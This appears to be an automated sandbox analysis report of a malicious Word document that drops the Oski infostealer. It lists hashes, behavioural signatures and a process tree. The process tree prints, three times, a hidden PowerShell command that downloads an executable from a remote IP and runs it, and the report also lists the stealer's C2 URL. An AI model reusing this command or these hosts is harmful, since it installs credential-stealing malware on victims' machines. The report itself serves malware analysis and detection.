Analysis
-
max time kernel
142s -
max time network
145s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
02/08/2021, 08:55
Static task
static1
Behavioral task
behavioral1
Sample
Swift Mesaji-20210802YPT21-150961.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
Swift Mesaji-20210802YPT21-150961.doc
Resource
win10v20210410
General
-
Target
Swift Mesaji-20210802YPT21-150961.doc
-
Size
228KB
-
MD5
0b45c5ecbbdcf6765b5528371029cdd0
-
SHA1
a02108313ffa4d961cc3f25e75d0b09feb170b8a
-
SHA256
c5a7de281ab02afc017d37a36f97b33e6487d67c9cfe4400a544f6b45890919b
-
SHA512
0f726f9982eaf2d5898e3f4220b02b54ba3c6de254a5b4a963052e18b39e409b904c8a9e3103fc1d4c0ddd93e40cc7bc8ff70670a3c5d2aea641d11715fba71a
Malware Config
Extracted
httP://185.230.160.197/dms/dms.exe
Extracted
oski
http://2.56.59.226/www/
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1476 2004 powershell.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1176 2004 powershell.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 924 2004 powershell.exe 24 -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 1476 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
pid Process 1916 dms.exe 820 dms.exe 384 dms.exe 1736 dms.exe 972 dms.exe 1756 dms.exe -
Loads dropped DLL 1 IoCs
pid Process 1476 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 820 set thread context of 1736 820 dms.exe 43 PID 384 set thread context of 972 384 dms.exe 44 PID 1916 set thread context of 1756 1916 dms.exe 46 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2004 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1476 powershell.exe 1476 powershell.exe 1176 powershell.exe 924 powershell.exe 1176 powershell.exe 924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 924 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2004 WINWORD.EXE 2004 WINWORD.EXE 2004 WINWORD.EXE 2004 WINWORD.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 2004 wrote to memory of 1476 2004 WINWORD.EXE 31 PID 2004 wrote to memory of 1476 2004 WINWORD.EXE 31 PID 2004 wrote to memory of 1476 2004 WINWORD.EXE 31 PID 2004 wrote to memory of 1476 2004 WINWORD.EXE 31 PID 2004 wrote to memory of 1176 2004 WINWORD.EXE 33 PID 2004 wrote to memory of 1176 2004 WINWORD.EXE 33 PID 2004 wrote to memory of 1176 2004 WINWORD.EXE 33 PID 2004 wrote to memory of 1176 2004 WINWORD.EXE 33 PID 2004 wrote to memory of 924 2004 WINWORD.EXE 35 PID 2004 wrote to memory of 924 2004 WINWORD.EXE 35 PID 2004 wrote to memory of 924 2004 WINWORD.EXE 35 PID 2004 wrote to memory of 924 2004 WINWORD.EXE 35 PID 1476 wrote to memory of 1916 1476 powershell.exe 38 PID 1476 wrote to memory of 1916 1476 powershell.exe 38 PID 1476 wrote to memory of 1916 1476 powershell.exe 38 PID 1476 wrote to memory of 1916 1476 powershell.exe 38 PID 1176 wrote to memory of 384 1176 powershell.exe 40 PID 1176 wrote to memory of 384 1176 powershell.exe 40 PID 1176 wrote to memory of 384 1176 powershell.exe 40 PID 1176 wrote to memory of 384 1176 powershell.exe 40 PID 924 wrote to memory of 820 924 powershell.exe 41 PID 924 wrote to memory of 820 924 powershell.exe 41 PID 924 wrote to memory of 820 924 powershell.exe 41 PID 924 wrote to memory of 820 924 powershell.exe 41 PID 2004 wrote to memory of 1052 2004 WINWORD.EXE 42 PID 2004 wrote to memory of 1052 2004 WINWORD.EXE 42 PID 2004 wrote to memory of 1052 2004 WINWORD.EXE 42 PID 2004 wrote to memory of 1052 2004 WINWORD.EXE 42 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 820 wrote to memory of 1736 820 dms.exe 43 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 384 wrote to memory of 972 384 dms.exe 44 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46 PID 1916 wrote to memory of 1756 1916 dms.exe 46
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Swift Mesaji-20210802YPT21-150961.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/dms/dms.exe','C:\Users\Admin\AppData\Roaming\dms.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\dms.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Users\Admin\AppData\Roaming\dms.exe"C:\Users\Admin\AppData\Roaming\dms.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Users\Admin\AppData\Roaming\dms.exe"C:\Users\Admin\AppData\Roaming\dms.exe"4⤵
- Executes dropped EXE
PID:1756
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/dms/dms.exe','C:\Users\Admin\AppData\Roaming\dms.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\dms.exe'"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Users\Admin\AppData\Roaming\dms.exe"C:\Users\Admin\AppData\Roaming\dms.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Users\Admin\AppData\Roaming\dms.exe"C:\Users\Admin\AppData\Roaming\dms.exe"4⤵
- Executes dropped EXE
PID:972
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/dms/dms.exe','C:\Users\Admin\AppData\Roaming\dms.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\dms.exe'"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Users\Admin\AppData\Roaming\dms.exe"C:\Users\Admin\AppData\Roaming\dms.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Users\Admin\AppData\Roaming\dms.exe"C:\Users\Admin\AppData\Roaming\dms.exe"4⤵
- Executes dropped EXE
PID:1736
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1052
-